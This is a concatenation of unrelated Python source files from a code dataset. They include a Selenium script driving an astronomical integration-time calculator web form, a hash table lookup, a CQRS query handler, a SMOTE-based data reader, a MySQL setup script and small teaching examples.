elif "pwfs" in Wavefront.lower():
driver.find_element_by_xpath("//input[@value='PWFS' and @name='Type']").click()
elif "aowfs" in Wavefront.lower() or "altair" in Wavefront.lower():
driver.find_element_by_xpath("//input[@value='AOWFS' and @name='Type']").click()
#---------------------------------------------------------------------------------------------------
def setDetectorPropertiesNIFS(driver, Read, Coating, Wavefront):
#Set read Mode and Well Depth
if "bright" in Read.lower():
driver.find_element_by_xpath("//input[@value='BRIGHT_OBJECT_SPEC' and @name='ReadMode']").click()
elif "medium" in Read.lower():
driver.find_element_by_xpath("//input[@value='MEDIUM_OBJECT_SPEC' and @name='ReadMode']").click()
elif "faint" in Read.lower():
driver.find_element_by_xpath("//input[@value='FAINT_OBJECT_SPEC' and @name='ReadMode']").click()
#Set Mirror Coating
if "silver" in Coating.lower():
driver.find_element_by_xpath("//input[@value='SILVER' and @name='Coating']").click()
elif "alum" in Coating.lower():
driver.find_element_by_xpath("//input[@value='ALUMINIUM' and @name='Coating']").click()
#Set Wavefront Sensor
if "oiwfs" in Wavefront.lower():
driver.find_element_by_xpath("//input[@value='OIWFS' and @name='Type']").click()
elif "pwfs" in Wavefront.lower():
driver.find_element_by_xpath("//input[@value='PWFS' and @name='Type']").click()
elif "aowfs" in Wavefront.lower() or "altair" in Wavefront.lower():
driver.find_element_by_xpath("//input[@value='AOWFS' and @name='Type']").click()
#---------------------------------------------------------------------------------------------------
def setDetectorPropertiesGNIRS(driver, Read, Coating, Wavefront):
#Set read Mode and Well Depth
if "verybright" in Read.lower():
driver.find_element_by_xpath("//input[@value='VERY_BRIGHT' and @name='ReadMode']").click()
elif "bright" in Read.lower():
driver.find_element_by_xpath("//input[@value='BRIGHT' and @name='ReadMode']").click()
elif "faint" in Read.lower():
driver.find_element_by_xpath("//input[@value='FAINT' and @name='ReadMode']").click()
elif "veryfaint" in Read.lower():
driver.find_element_by_xpath("//input[@value='VERY_FAINT' and @name='ReadMode']").click()
#Set Mirror Coating
if "silver" in Coating.lower():
driver.find_element_by_xpath("//input[@value='SILVER' and @name='Coating']").click()
elif "alum" in Coating.lower():
driver.find_element_by_xpath("//input[@value='ALUMINIUM' and @name='Coating']").click()
#Set Wavefront Sensor
if "oiwfs" in Wavefront.lower():
driver.find_element_by_xpath("//input[@value='OIWFS' and @name='Type']").click()
elif "pwfs" in Wavefront.lower():
driver.find_element_by_xpath("//input[@value='PWFS' and @name='Type']").click()
elif "aowfs" in Wavefront.lower() or "altair" in Wavefront.lower():
driver.find_element_by_xpath("//input[@value='AOWFS' and @name='Type']").click()
#---------------------------------------------------------------------------------------------------
# For Michelle and TReCS
def setDetectorPropertiesMichelle(driver, Mirror, Port, Wavefront):
#Set Mirror Coating
if "silver" in Mirror.lower():
driver.find_element_by_xpath("//input[@value='SILVER' and @name='Coating']").click()
elif "alum" in Mirror.lower():
driver.find_element_by_xpath("//input[@value='ALUMINIUM' and @name='Coating']").click()
#Set Instrument Port
if "side" in Port.lower():
driver.find_element_by_xpath("//input[@value='SIDE_LOOKING' and @name='IssPort']").click()
else:
driver.find_element_by_xpath("//input[@value='UP_LOOKING' and @name='IssPort']").click()
#Set Wavefront Sensor
if "oiwfs" in Wavefront.lower():
driver.find_element_by_xpath("//input[@value='OIWFS' and @name='Type']").click()
elif "pwfs" in Wavefront.lower():
driver.find_element_by_xpath("//input[@value='PWFS' and @name='Type']").click()
elif "aowfs" in Wavefront.lower() or "altair" in Wavefront.lower():
driver.find_element_by_xpath("//input[@value='AOWFS' and @name='Type']").click()
#---------------------------------------------------------------------------------------------------
def setOpticalPropertiesTReCS(driver, Cryostat, Filter, FPM, Grating, Wavelength):
logger = logging.getLogger('setOpticalPropertiesTReCS')
time.sleep(sleep)
# Set Cryostat
driver.find_element_by_xpath("//select[@name='WindowWheel']/option[@value='" + Cryostat + "']").click()
# Set Filter
driver.find_element_by_xpath("//select[@name='Filter']/option[@value='" + Filter + "']").click()
# Set FPM
driver.find_element_by_xpath("//select[@name='Mask']/option[@value='" + FPM + "']").click()
# Set Grating
driver.find_element_by_xpath("//select[@name='Disperser']/option[@value='" + Grating + "']").click()
# Set Spectrum Central Wavelength
logger.debug('Setting central wavelength to %s um', Wavelength)
driver.find_element_by_name("instrumentCentralWavelength").clear()
driver.find_element_by_name("instrumentCentralWavelength").send_keys(Wavelength)
#---------------------------------------------------------------------------------------------------
def setOpticalPropertiesMichelle(driver, Filter, FPM, Grating, Wavelength, Polarimetry):
logger = logging.getLogger('setOpticalPropertiesMichelle')
time.sleep(sleep)
# Set Filter
driver.find_element_by_xpath("//select[@name='Filter']/option[@value='" + Filter + "']").click()
# Set FPM
driver.find_element_by_xpath("//select[@name='Mask']/option[@value='" + FPM + "']").click()
# Set Grating
driver.find_element_by_xpath("//select[@name='Disperser']/option[@value='" + Grating + "']").click()
# Set Spectrum Central Wavelength
logger.debug('Setting central wavelength to %s um', Wavelength)
driver.find_element_by_name("instrumentCentralWavelength").clear()
driver.find_element_by_name("instrumentCentralWavelength").send_keys(Wavelength)
# Set Polarimetry
if "dis" in Polarimetry.lower():
driver.find_element_by_xpath("//input[@value='NO' and @name='polarimetry']").click()
else:
driver.find_element_by_xpath("//input[@value='YES' and @name='polarimetry']").click()
#---------------------------------------------------------------------------------------------------
def setOpticalPropertiesNIFS(driver, Filter, Grating, Wavelength):
logger = logging.getLogger('setOpticalPropertiesNIFS')
time.sleep(sleep)
# Set Filter
if "zj" in Filter.lower() or "z-j" in Filter.lower():
driver.find_element_by_xpath("//select[@name='Filter']/option[@value='ZJ_FILTER']").click()
elif "jh" in Filter.lower() or "j-h" in Filter.lower() or "hj" in Filter.lower():
driver.find_element_by_xpath("//select[@name='Filter']/option[@value='JH_FILTER']").click()
elif "hk" in Filter.lower() or "h-k" in Filter.lower():
driver.find_element_by_xpath("//select[@name='Filter']/option[@value='HK_FILTER']").click()
# Set Grating
if "z" in Grating.lower():
driver.find_element_by_xpath("//select[@name='Disperser']/option[@value='Z']").click()
elif "short" in Grating.lower():
driver.find_element_by_xpath("//select[@name='Disperser']/option[@value='K_SHORT']").click()
elif "long" in Grating.lower():
driver.find_element_by_xpath("//select[@name='Disperser']/option[@value='K_LONG']").click()
elif "j" in Grating.lower():
driver.find_element_by_xpath("//select[@name='Disperser']/option[@value='J']").click()
elif "h" in Grating.lower():
driver.find_element_by_xpath("//select[@name='Disperser']/option[@value='H']").click()
else:
driver.find_element_by_xpath("//select[@name='Disperser']/option[@value='K']").click()
# Set Spectrum Central Wavelength
if type(Wavelength) is float:
Wavelength = str(Wavelength)
logger.debug('Setting central wavelength to %s um', Wavelength)
driver.find_element_by_name("instrumentCentralWavelength").clear()
driver.find_element_by_name("instrumentCentralWavelength").send_keys(Wavelength)
#---------------------------------------------------------------------------------------------------
def setOpticalPropertiesGNIRS(driver, Camera, FPM, Grating, Wavelength, Cross):
logger = logging.getLogger('setOpticalPropertiesGNIRS')
time.sleep(sleep)
# Set Camera
driver.find_element_by_xpath("//select[@name='PixelScale']/option[@value='" + Camera + "']").click()
# Set Focal Plane Mask
driver.find_element_by_xpath("//select[@name='SlitWidth']/option[@value='" + FPM + "']").click()
# Set Grating
driver.find_element_by_xpath("//select[@name='Disperser']/option[@value='" + Grating + "']").click()
# Set Central Wavelength
if type(Wavelength) is float:
Wavelength = str(Wavelength)
logger.debug('Setting central wavelength to %s um', Wavelength)
driver.find_element_by_name("instrumentCentralWavelength").clear()
driver.find_element_by_name("instrumentCentralWavelength").send_keys(Wavelength)
# Set Cross Dispersed
if "no" in Cross.lower():
driver.find_element_by_xpath("//select[@name='CrossDispersed']/option[@value='NO']").click()
else:
driver.find_element_by_xpath("//select[@name='CrossDispersed']/option[@value='SXD']").click()
#---------------------------------------------------------------------------------------------------
def setOpticalPropertiesGMOS(driver, Grating, Filter, CentralWavelength, FPU):
logger = logging.getLogger('setOpticalPropertiesGMOS')
time.sleep(sleep)
# Set Grating
driver.find_element_by_xpath("//select[@name='instrumentDisperser']/option[@value='" + Grating + "']").click()
# Set Filter
driver.find_element_by_xpath("//select[@name='instrumentFilter']/option[@value='" + Filter + "']").click()
# Set Central Wavelength
logger.debug('Setting central wavelength to %s nm', CentralWavelength)
driver.find_element_by_name("instrumentCentralWavelength").clear()
driver.find_element_by_name("instrumentCentralWavelength").send_keys(CentralWavelength)
# Alternatively:
#cwav = driver.find_element_by_name("instrumentCentralWavelength")
#cwav.clear()
#cwav.send_keys(CentralWavelength)
# or:
#cwav = driver.find_element_by_xpath("//input[@name='instrumentCentralWavelength']")
#cwav.clear()
#cwav.send_keys(CentralWavelength)
# Set Focal Plane Unit
driver.find_element_by_xpath("//select[@name='instrumentFPMask']/option[@value='" + FPU + "']").click()
#---------------------------------------------------------------------------------------------------
# <NAME>, 2013-09-06
def setOpticalPropertiesGSAOI(driver, Filter):
#Set Filter
driver.find_element_by_xpath("//select[@name='Filter']/option[@value='" + Filter + "']").click()
#---------------------------------------------------------------------------------------------------
# <NAME>, 2013-09-10
def setOpticalPropertiesF2(driver, Filter, Disperser, FPM):
time.sleep(sleep)
#Set Filter
driver.find_element_by_xpath("//select[@name='Filter']/option[@value='" + Filter + "']").click()
#Set Disperser
driver.find_element_by_xpath("//select[@name='Disperser']/option[@value='" + Disperser + "']").click()
#Set FPM
driver.find_element_by_xpath("//select[@name='FPUnit']/option[@value='" + FPM + "']").click()
#---------------------------------------------------------------------------------------------------
def setOpticalPropertiesNIRI(driver, Camera, Filter, Disperser, FPM):
time.sleep(sleep)
#Set Camera
driver.find_element_by_xpath("//select[@name='Camera']/option[@value='" + Camera + "']").click()
#Set Filter
driver.find_element_by_xpath("//select[@name='Filter']/option[@value='" + Filter + "']").click()
#Set Disperser
driver.find_element_by_xpath("//select[@name='Disperser']/option[@value='" + Disperser + "']").click()
#Set FPM
driver.find_element_by_xpath("//select[@name='Mask']/option[@value='" + FPM + "']").click()
#---------------------------------------------------------------------------------------------------
def setAltairProperties(driver, Seperation, Brightness, FieldLens, Mode):
#Set AO Guide Star Separation
if type(Seperation) is float:
Seperation = str(Seperation)
driver.find_element_by_name("guideSep").clear()
driver.find_element_by_name("guideSep").send_keys(Seperation)
#Set Guide Star Brightness (R-Band)
if type(Brightness) is float:
Brightness = str(Brightness)
driver.find_element_by_name("guideMag").clear()
driver.find_element_by_name("guideMag").send_keys(Brightness)
#Set Field Lens
driver.find_element_by_xpath("//input[@value='" + FieldLens.upper() + "' and @name='FieldLens']").click()
#Set Altair Mode
if "ngs" in Mode.lower() or "natural" in Mode.lower():
driver.find_element_by_xpath("//input[@value='NGS' and @name='GuideStarType']").click()
else:
driver.find_element_by_xpath("//input[@value='LGS' and @name='GuideStarType']").click()
#---------------------------------------------------------------------------------------------------
def setObservingConditions(driver, ImageQuality, CloudCover, WaterVapour, SkyBackground, AirMass):
#set Image Quality
if ImageQuality == 20:
Value = "PERCENT_20"
elif ImageQuality == 70:
Value = "PERCENT_70"
elif ImageQuality == 85:
Value = "PERCENT_85"
else:
Value = "ANY"
driver.find_element_by_xpath("//input[@name='ImageQuality' and @value='" + Value + "']").click()
#Set Cloud Cover
if CloudCover == 50:
Value = "PERCENT_50"
elif CloudCover == 70:
Value = "PERCENT_70"
elif CloudCover == 80:
Value = "PERCENT_80"
else:
Value = "ANY"
driver.find_element_by_xpath("//input[@name='CloudCover' and @value='" + Value + "']").click()
#Set Water Vapour
if WaterVapour == 20:
Value = "PERCENT_20"
elif WaterVapour == 50:
Value = "PERCENT_50"
elif WaterVapour == 80:
Value = "PERCENT_80"
else:
Value = "ANY"
driver.find_element_by_xpath("//input[@name='WaterVapor' and @value='" + Value + "']").click()
#Set Sky Background
if SkyBackground == 20:
Value = "PERCENT_20"
elif SkyBackground == 50:
Value = "PERCENT_50"
elif SkyBackground == 80:
Value = "PERCENT_80"
else:
Value = "ANY"
#If SkyBackground is set to 0, don't try to set it
if not SkyBackground == 0:
driver.find_element_by_xpath("//input[@name='SkyBackground' and @value='" + Value + "']").click()
#Set Air Mass
if type(AirMass) is int or type(AirMass) is float:
AirMass = str(AirMass)
driver.find_element_by_xpath("//input[@name='Airmass' and @value='" + AirMass + "']").click()
#---------------------------------------------------------------------------------------------------
# Calculation method for Michelle and TReCS
def setCalculationMethodMichelle(driver, ResultMethod, Value1, Fraction):
#Set Fraction to a string
Fraction = str(Fraction)
Value1 = str(Value1)
#Set Results Method, Total Integration or S/N Ratio
if "ratio" in ResultMethod.lower():
driver.find_element_by_xpath("//input[@value='s2n' and @name='calcMethod']").click()
driver.find_element_by_name("expTimeA").clear()
driver.find_element_by_name("expTimeA").send_keys(Value1)
driver.find_element_by_name("fracOnSourceA").clear()
driver.find_element_by_name("fracOnSourceA").send_keys(Fraction)
else:
#Choose Total Integration Time
driver.find_element_by_xpath("//input[@value='intTime' and @name='calcMethod']").click()
driver.find_element_by_name("sigmaC").clear()
driver.find_element_by_name("sigmaC").send_keys(Value1)
driver.find_element_by_name("fracOnSourceC").clear()
driver.find_element_by_name("fracOnSourceC").send_keys(Fraction)
#---------------------------------------------------------------------------------------------------
def setCalculationMethod(driver, ResultMethod, Value1, Time, Fraction, Choose=True):
# For instruments w/o coadd option
#Set Fraction to a string
Fraction = str(Fraction)
Value1 = str(Value1)
#Set the Results Method, Total Integration or S/N ratio
if "ratio" in ResultMethod.lower():
if Choose:
driver.find_element_by_xpath("//input[@value='s2n' and @name='calcMethod']").click()
driver.find_element_by_name("numExpA").clear()
driver.find_element_by_name("numExpA").send_keys(Value1)
driver.find_element_by_name("expTimeA").clear()
driver.find_element_by_name("expTimeA").send_keys(Time)
driver.find_element_by_name("fracOnSourceA").clear()
driver.find_element_by_name("fracOnSourceA").send_keys(Fraction)
else:
driver.find_element_by_xpath("//input[@value='intTime' and @name='calcMethod']").click()
driver.find_element_by_name("sigmaC").clear()
driver.find_element_by_name("sigmaC").send_keys(Value1)
driver.find_element_by_name("expTimeC").clear()
driver.find_element_by_name("expTimeC").send_keys(Time)
driver.find_element_by_name("fracOnSourceC").clear()
driver.find_element_by_name("fracOnSourceC").send_keys(Fraction)
# ---------------------------------------------------------------------------------------------------
def setCalculationMethodCoadd(driver, ResultMethod, Value1, Ncoadd, Time, Fraction, Choose=True):
# For instruments with a coadd option
# Set Fraction to a string
Fraction = str(Fraction)
Ncoadd = str(Ncoadd)
Value1 = str(Value1)
# Set the Results Method, Total Integration or S/N ratio
if "ratio" in ResultMethod.lower():
if Choose:
driver.find_element_by_xpath("//input[@value='s2n' and @name='calcMethod']").click()
driver.find_element_by_name("numExpA").clear()
driver.find_element_by_name("numExpA").send_keys(Value1)
driver.find_element_by_name("numCoaddsA").clear()
driver.find_element_by_name("numCoaddsA").send_keys(Ncoadd)
driver.find_element_by_name("expTimeA").clear()
driver.find_element_by_name("expTimeA").send_keys(Time)
driver.find_element_by_name("fracOnSourceA").clear()
driver.find_element_by_name("fracOnSourceA").send_keys(Fraction)
else:
driver.find_element_by_xpath("//input[@value='intTime' and @name='calcMethod']").click()
driver.find_element_by_name("sigmaC").clear()
driver.find_element_by_name("sigmaC").send_keys(Value1)
driver.find_element_by_name("numCoaddsC").clear()
driver.find_element_by_name("numCoaddsC").send_keys(Ncoadd)
driver.find_element_by_name("expTimeC").clear()
driver.find_element_by_name("expTimeC").send_keys(Time)
driver.find_element_by_name("fracOnSourceC").clear()
driver.find_element_by_name("fracOnSourceC").send_keys(Fraction)
#---------------------------------------------------------------------------------------------------
# Slit Length is only for user defined aperture
# If using optimum aperture, only pass 3 arguments (driver,Type,Times)
# Used for GMOS, Michelle and TReCS
def setAnalysisMethodGMOS(driver, Type, Times, SlitLength=0):
if type(SlitLength) is float:
SlitLength = str(SlitLength)
if type(Times) is float:
Times = str(Times)
if "optimum" in Type.lower() or "ratio" in Type.lower() or "s/n" in Type.lower():
driver.find_element_by_xpath("//input[@value='autoAper' and @name='analysisMethod']").click()
driver.find_element_by_name("autoSkyAper").clear()
driver.find_element_by_name("autoSkyAper").send_keys(Times)
else:
driver.find_element_by_xpath("//input[@value='userAper' and @name='analysisMethod']").click()
driver.find_element_by_name("userAperDiam").clear()
driver.find_element_by_name("userAperDiam").send_keys(SlitLength)
driver.find_element_by_name("userSkyAper").clear()
driver.find_element_by_name("userSkyAper").send_keys(Times)
#---------------------------------------------------------------------------------------------------
# Analysis Method procedure for most instruments other than GMOS
def setAnalysisMethod(driver, Type, Slitlength=0):
if type(Slitlength) is float:
Slitlength = str(Slitlength)
if "optimum" in Type.lower() or "ratio" in Type.lower() or "s/n" in Type.lower():
#Set for Optimum S/N Ratio
driver.find_element_by_xpath("//input[@value='autoAper' and @name='aperType']").click()
else:
#Set for aperture of diameter (slit length) = X
driver.find_element_by_xpath("//input[@value='userAper' and @name='aperType']").click()
driver.find_element_by_name("userAperDiam").clear()
driver.find_element_by_name("userAperDiam").send_keys(Slitlength)
# ---------------------------------------------------------------------------------------------------
# Analysis Method procedure for GSAOI
def setAnalysisMethodGSAOI(driver, Type, Offset=5.0, largeSkyOffset=0, aperDiam=2.0):
if type(Offset) is float:
Offset = str(Offset)
if type(largeSkyOffset) is int:
largeSkyOffset = str(largeSkyOffset)
if type(aperDiam) is float:
aperDiam = str(aperDiam)
driver.find_element_by_name("offset").clear()
driver.find_element_by_name("offset").send_keys(Offset)
driver.find_element_by_name("largeSkyOffset").clear()
driver.find_element_by_name("largeSkyOffset").send_keys(largeSkyOffset)
if "optimum" in Type.lower() or "ratio" in Type.lower() or "s/n" in Type.lower():
# Set for Optimum S/N Ratio
driver.find_element_by_xpath("//input[@value='autoAper']").click()
else:
# Set for aperture of diameter (slit length) = X
driver.find_element_by_xpath("//input[@value='userAper' and @name='aperType']").click()
driver.find_element_by_name("userAperDiam").clear()
driver.find_element_by_name("userAperDiam").send_keys(aperDiam)
# ---------------------------------------------------------------------------------------------------
def setIFUSpectroscopy(driver, Type, Offset1, Offset2=0):
#Change Offsets to strings
if type(Offset1) is float:
Offset1 = str(Offset1)
if type(Offset2) is float:
Offset2 = str(Offset2)
#Choose the type
if "sum" in Type.lower():
driver.find_element_by_xpath("//input[@value='summedIFU' and @name='ifuMethod']").click()
driver.find_element_by_name("ifuNumX").clear()
driver.find_element_by_name("ifuNumX").send_keys(Offset1)
driver.find_element_by_name("ifuNumY").clear()
driver.find_element_by_name("ifuNumY").send_keys(Offset2)
elif "multi" in Type.lower():
#Choose Multiple IFU elements
driver.find_element_by_xpath("//input[@value='radialIFU' and @name='ifuMethod']").click()
driver.find_element_by_name("ifuMinOffset").clear()
driver.find_element_by_name("ifuMinOffset").send_keys(Offset1)
driver.find_element_by_name("ifuMaxOffset").clear()
driver.find_element_by_name("ifuMaxOffset").send_keys(Offset2)
else:
#Choose individual IFU element
driver.find_element_by_xpath("//input[@value='singleIFU' and @name='ifuMethod']").click()
driver.find_element_by_name("ifuOffset").clear()
driver.find_element_by_name("ifuOffset").send_keys(Offset1)
#---------------------------------------------------------------------------------------------------
def calculate(driver):
#Click Calculate button
driver.find_element_by_xpath("//input[@value='Calculate' and @type='submit']").click()
#---------------------------------------------------------------------------------------------------
def extractData(driver, Type, TestNumber, Instrument, Testing, Cross=False):
logger = logging.getLogger('extractData')
# Turn TestNumber into a str
if type(TestNumber) is int:
TestNumber = str(TestNumber)
# Check if Folders exist to save to, else create them
path = GetPath(Instrument, Testing)
if not os.path.exists(path):
os.mkdir(path)
FileLocation = path + '/Test' + TestNumber
# If using GNIRS Cross-Dispersed, no need to check Single Exposure S/N
if Cross:
FileList = ("signal spectrum", "background spectrum", "Final")
else:
FileList = ("signal spectrum", "background spectrum", "Single Exposure", "Final")
# Generate list of all open windows:
windowsList = driver.window_handles
# Switch to results window:
driver.switch_to.window(windowsList[1])
# Imaging
if "imag" in Type.lower():
pass
# Spectroscopy
else:
for fileToSave in FileList:
logger.debug('fileToSave = %s', fileToSave)
fileObject = driver.find_element_by_partial_link_text(fileToSave)
fileLink = fileObject.get_attribute("href")
logger.debug('fileLink = %s', fileLink)
# Open the file and write to output
u = urlopen(fileLink)
localFile = open(FileLocation + '-' + fileToSave.replace(' ','') + '.dat', 'wb')
localFile.write(u.read())
localFile.close()
pass
# Save the results page
pageData = driver.page_source
localFile = open(FileLocation + '-output.html', 'w')
localFile.write(pageData)
localFile.close()
#if not Archiving:
# compareData(driver,Type,TestNumber,Instrument,Cross)
#---------------------------------------------------------------------------------------------------
def ConfigureLogging(logfile=None, filelevel='INFO', screenlevel='INFO'):
logger = logging.getLogger()
# DEBUG    Detailed information, typically of interest only when diagnosing problems.
# INFO     Confirmation that things are working as expected.
# WARNING  An indication that something unexpected happened, or indicative of some problem in the near future.
# ERROR    Due to a more serious problem, the software has not been able to perform some function.
# CRITICAL A serious error, indicating that the program itself may be unable to continue running.
# set minimum threshold level for logger:
logger.setLevel(logging.DEBUG)
# create formatter and add it to the handlers:
#formatter = logging.Formatter('%(asctime)s %(name)-10s %(levelname)-8s %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
formatter = logging.Formatter('%(asctime)s %(levelname)-8s %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
if logfile: # create file handler:
logfilehandler = logging.FileHandler(logfile)
if filelevel.upper() == 'DEBUG':
logfilehandler.setLevel(logging.DEBUG)
elif filelevel.upper() == 'INFO':
logfilehandler.setLevel(logging.INFO)
elif filelevel.upper() == 'WARNING':
logfilehandler.setLevel(logging.WARNING)
elif filelevel.upper() == 'ERROR':
logfilehandler.setLevel(logging.ERROR)
elif filelevel.upper() == 'CRITICAL':
logfilehandler.setLevel(logging.CRITICAL)
else:
print ('ERROR: Unknown log error level')
logfilehandler.setLevel(logging.INFO)
logfilehandler.setFormatter(formatter)
logger.addHandler(logfilehandler)
# create console screen log handler:
consoleloghandler = logging.StreamHandler()
if screenlevel.upper() == 'DEBUG':
consoleloghandler.setLevel(logging.DEBUG)
elif screenlevel.upper() == 'INFO':
consoleloghandler.setLevel(logging.INFO)
elif screenlevel.upper() == 'WARNING':
consoleloghandler.setLevel(logging.WARNING)
elif screenlevel.upper() == 'ERROR':
consoleloghandler.setLevel(logging.ERROR)
elif screenlevel.upper() == 'CRITICAL':
consoleloghandler.setLevel(logging.CRITICAL)
else:
print('ERROR: Unknown screen log level; defaulting to INFO')
consoleloghandler.setLevel(logging.INFO)
consoleloghandler.setFormatter(formatter)
logger.addHandler(consoleloghandler)
return logger
#---------------------------------------------------------------------------------------------------
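# A minimal usage sketch (not part of the original script; the file name and levels below
# are illustrative assumptions): configure logging before driving the browser tests.
#
# logger = ConfigureLogging(logfile='itc_tests.log', filelevel='DEBUG', screenlevel='INFO')
# logger.info('Logging configured, starting ITC tests')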
| 2.125
| 2
|
source-code-from-author-book/Listings-for-Second-Edition/listing_5_8.py
|
robrac/algorithms-exercises-with-python
| 0
|
12777659
|
label=hashtablecodesearch,index={get,\_\_getitem\_\_,\_\_setitem\_\_},float=htb]
def get(self,key):
startslot = self.hashfunction(key,len(self.slots))
data = None
stop = False
found = False
position = startslot
while self.slots[position] != None and \
not found and not stop:
if self.slots[position] == key:
found = True
data = self.data[position]
else:
position=self.rehash(position,len(self.slots))
if position == startslot:
stop = True
return data
def __getitem__(self,key):
return self.get(key)
def __setitem__(self,key,data):
self.put(key,data)
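# Usage sketch (an assumption, since this listing only shows get/__getitem__/__setitem__):
# with the rest of the chapter's HashTable class in scope (put, hashfunction, rehash,
# slots, data), the table supports dictionary-style access.
#
# h = HashTable()
# h[54] = "cat"
# h[26] = "dog"
# print(h[54])   # -> "cat"
# print(h[99])   # -> None (key not present)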
| 2.765625
| 3
|
src/api/domain/operation/GetDataOperationJobExecutionLogList/GetDataOperationJobExecutionLogListQueryHandler.py
|
PythonDataIntegrator/pythondataintegrator
| 14
|
12777660
|
from injector import inject
from domain.operation.GetDataOperationJobExecutionLogList.GetDataOperationJobExecutionLogListMapping import GetDataOperationJobExecutionLogListMapping
from domain.operation.GetDataOperationJobExecutionLogList.GetDataOperationJobExecutionLogListQuery import GetDataOperationJobExecutionLogListQuery
from domain.operation.GetDataOperationJobExecutionLogList.GetDataOperationJobExecutionLogListResponse import GetDataOperationJobExecutionLogListResponse
from domain.operation.GetDataOperationJobExecutionLogList.GetDataOperationJobExecutionLogListSpecifications import GetDataOperationJobExecutionLogListSpecifications
from infrastructure.cqrs.IQueryHandler import IQueryHandler
from infrastructure.data.RepositoryProvider import RepositoryProvider
from infrastructure.dependency.scopes import IScoped
class GetDataOperationJobExecutionLogListQueryHandler(IQueryHandler[GetDataOperationJobExecutionLogListQuery], IScoped):
@inject
def __init__(self,
repository_provider: RepositoryProvider,
specifications: GetDataOperationJobExecutionLogListSpecifications):
self.repository_provider = repository_provider
self.specifications = specifications
def handle(self, query: GetDataOperationJobExecutionLogListQuery) -> GetDataOperationJobExecutionLogListResponse:
result = GetDataOperationJobExecutionLogListResponse()
data_query = self.specifications.specify(query=query)
result.Data = GetDataOperationJobExecutionLogListMapping.to_dtos(data_query)
return result
| 2.03125
| 2
|
code/data_reader.py
|
matheusjohannaraujo/ML-Experiments_FuzzyClustering_ProbClassifiers
| 1
|
12777661
|
<reponame>matheusjohannaraujo/ML-Experiments_FuzzyClustering_ProbClassifiers<gh_stars>1-10
import pandas as pd
import parameters as params
import numpy as np
from sklearn.preprocessing import StandardScaler, MinMaxScaler
from imblearn.over_sampling import SMOTE
class DataReader:
def __init__(self):
path = f'{params.DATA_BASE_PATH}{params.DATA_FILENAME}'
self.data = pd.read_csv(
path,
delim_whitespace=True
)
def get_y_labels(self, y):
temp = np.unique(y)
i = 0
for val in temp:
y[y==val] = i
i += 1
return np.array(y, dtype=int)
def get_data(self):
y = np.array(self.data.values[:, -1])
y = self.get_y_labels(y)
X = self.data.values[:, 1:-1]
# X = self.data.drop(columns=['class', 'sequence_name', 'pox', 'erl'])
# X = X.values
# X = self.scaled_data = StandardScaler().fit_transform(X)
return np.array(X, dtype=float), y
def get_oversampled_data(self, X, y):
sm = SMOTE(k_neighbors=3)
# Fit the model to generate the data.
X_new, y_new = sm.fit_resample(X, y)
return X_new, y_new
def get_preprocessed_data(self):
y = np.array(self.data.values[:, -1])
y = self.get_y_labels(y)
X = self.data.drop(columns=['class', 'sequence_name'])
# X_new, y_new = self.get_oversampled_data(X, y)
return X.values, y
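# Usage sketch (assumption: parameters.py points DATA_BASE_PATH/DATA_FILENAME at a
# whitespace-delimited file whose last column is the class label):
#
# reader = DataReader()
# X, y = reader.get_preprocessed_data()
# X_bal, y_bal = reader.get_oversampled_data(X, y)
# print(X_bal.shape, np.bincount(y_bal))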
| 2.40625
| 2
|
core/src/test/python/exception_test.py
|
11bluetree/weblogic-deploy-tooling
| 1
|
12777662
|
"""
Copyright (c) 2017, 2019, Oracle Corporation and/or its affiliates. All rights reserved.
Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl.
"""
import unittest
from wlsdeploy.exception import exception_helper
from wlsdeploy.exception.expection_types import ExceptionType
class ExceptionHelperTestCase(unittest.TestCase):
def testCreateException(self):
ex = exception_helper.create_exception(ExceptionType.CREATE, 'WLSDPLY-12400',
'createDomain', '-oracle_home')
self.assertNotEquals(ex, None)
return
| 2.1875
| 2
|
python/tuples_example.py
|
matheuskiser/pdx_code_guild
| 0
|
12777663
|
# Assigns a tuple of scores
scores = (1, 2, 3, 4, 5, 6, 7, 8, 9, 10)
# Displays the highest and lowest value in the tuple
print "The lowest possible score is " + str(min(scores))
print "The highest possible score is " + str(max(scores))
# Goes through tuple and prints out values
for i in scores:
if i == 1:
print "A judge can give a gymnast " + str(i) + " point."
else:
print "A judge can give a gymnast " + str(i) + " points."
| 4.40625
| 4
|
setup.py
|
yetone/collipa
| 99
|
12777664
|
<gh_stars>10-100
# coding: utf-8
import re
import sys
import getopt
import MySQLdb
from pony.orm import db_session
from collipa import config
@db_session
def init_node():
from collipa.models import Node
if not Node.get(id=1):
Node(name=u'根节点', urlname='root',
description=u'一切的根源').save()
def convert(name):
s1 = re.sub('(.)([A-Z][a-z]+)', r'\1_\2', name)
return re.sub('([a-z0-9])([A-Z])', r'\1_\2', s1).lower()
def merge():
m = MySQLdb.connect(host=config.db_host, user=config.db_user,
passwd=config.db_<PASSWORD>, db=config.db_name)
c = m.cursor()
c.execute(r'show tables')
old_table_names = [x[0] for x in c]
try:
for old_table_name in old_table_names:
table_name = old_table_name.lower()
sql = r'RENAME TABLE %s TO %s' % (old_table_name, table_name)
print(sql)
c.execute(sql)
c.close()
m.commit()
m.close()
except Exception as e:
print(type(e).__name__)
print(e)
raise
def main(argv):
try:
opts, args = getopt.getopt(argv, "", ["install", "init",
"iwanttodropdatabase", 'merge'])
except getopt.GetoptError:
print("参数错误")
sys.exit(2)
for opt, val in opts:
if opt == '--merge':
merge()
print('merge 成功!')
if opt == "--init":
m = MySQLdb.connect(host=config.db_host, user=config.db_user,
passwd=config.db_pass)
c = m.cursor()
# create database
try:
c.execute("create database %s" % config.db_name)
c.execute("grant all privileges on %s.* to '%s'@'localhost' identified by '%s'" %
(config.db_name, config.db_user, config.db_pass))
c.execute("flush privileges")
c.close()
m.commit()
m.close()
except Exception:
pass
# create tables
from collipa.models import db
db.generate_mapping(create_tables=True)
init_node()
print("数据库表初始化成功")
if __name__ == "__main__":
main(sys.argv[1:])
| 2.25
| 2
|
Data Structures/LinkedList/Doubly Linked List/Insertion_at_front.py
|
chasesagar/Python-Programming
| 0
|
12777665
|
# Doubly Linked List
class Node:
def __init__(self,data):
self.data = data
self.next = None
self.prev = None
class DoublyLinkedList:
def __init__(self):
self.head = None
# Main insertion function
def Push(self,new_data):
new_node = Node(new_data) # 1 & 2: Allocate the Node & Put in the data
new_node.next = self.head # 3. Make next of new node as head
if self.head is not None: # 4. change prev of head node to new node
self.head.prev = new_node
self.head = new_node # 5. move the head to point to the new node
